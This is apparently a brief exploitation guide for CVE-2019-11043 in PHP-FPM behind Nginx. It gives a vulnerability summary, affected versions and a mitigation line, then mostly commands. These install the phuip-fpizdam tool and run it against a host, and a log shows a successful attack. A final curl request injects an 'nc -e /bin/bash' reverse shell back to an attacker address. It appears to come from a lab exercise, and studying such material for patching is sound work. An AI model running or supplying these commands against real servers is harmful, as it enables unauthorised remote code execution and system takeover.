CVE-2019-11043

1. Vulnerability description

PHP-FPM in PHP 7 has a remote code execution vulnerability. When Nginx splits the request URI with a regex and forwards the PATH_INFO part to PHP-FPM, a URL that contains an encoded newline (%0a) makes the regex fail and leaves PATH_INFO empty; PHP-FPM's pointer arithmetic on env_path_info then underflows, so the attacker can write past a buffer, overwrite FastCGI parameters and inject php.ini directives (PHP_VALUE, e.g. auto_prepend_file). The phuip-fpizdam tool below automates this to get arbitrary command execution as the PHP-FPM worker user.

2. Affected versions

In an Nginx + PHP-FPM setup where Nginx passes PATH_INFO to PHP-FPM with the common split configuration (fastcgi_split_path_info ^(.+?\.php)(/.*)$; together with fastcgi_param PATH_INFO $fastcgi_path_info;, and no try_files check that rejects requests for non-existent scripts first), the following PHP versions are affected. PHP 5.6 is also affected, but there the bug only crashes the worker; remote code execution has not been achieved:

  • 7.1.x below 7.1.33
  • 7.2.x below 7.2.24
  • 7.3.x below 7.3.11

Upgrading to the fixed releases is the real fix; adding try_files $fastcgi_script_name =404; to the PHP location is the usual configuration-side mitigation.

3. Exploitation

apt-get install golang
go get github.com/neex/phuip-fpizdam
# on Go 1.17 and later "go get" no longer installs binaries; use instead:
# go install github.com/neex/phuip-fpizdam@latest
export PATH=$PATH:$(go env GOPATH)/bin

Usage

phuip-fpizdam http://192.168.42.43/index.php
curl http://192.168.42.115/index.php/?a=/bin/sh+-c+'<cmd>;<cmd>'
URL-encode the quoted '<cmd>;<cmd>' part: the + signs decode to spaces on the PHP side, and percent-encoding spaces, quotes, ; and / keeps curl and your local shell from interpreting them. Only the PHP-FPM workers that phuip-fpizdam managed to poison carry the injected auto_prepend_file setting, so if a request returns nothing, resend it a few times.

Reference run

┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# phuip-fpizdam http://192.168.42.43/index.php
2024/12/04 12:39:32 Base status code is 200
2024/12/04 12:39:32 Status code 502 for qsl=1765, adding as a candidate
2024/12/04 12:39:32 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2024/12/04 12:39:32 Attack params found: --qsl 1755 --pisos 23 --skip-detect
2024/12/04 12:39:32 Trying to set "session.auto_start=0"...
2024/12/04 12:39:32 Detect() returned attack params: --qsl 1755 --pisos 23 --skip-detect <-- REMEMBER THIS
2024/12/04 12:39:32 Performing attack using php.ini settings...
2024/12/04 12:39:33 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2024/12/04 12:39:33 Trying to cleanup /tmp/a...
2024/12/04 12:39:33 Done!

# urlencode('id;nc -e /bin/bash 192.168.42.39 1234 ')  -- reverse shell back to the attacker on 192.168.42.39:1234
# (nc -e needs a netcat build that supports -e, e.g. nc.traditional or ncat; start the listener before sending)
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# curl http://192.168.42.115/index.php/?a=/bin/sh+-c+%27id%3Bnc%20-e%20%2Fbin%2Fbash%20192.168.42.39%201234%20%27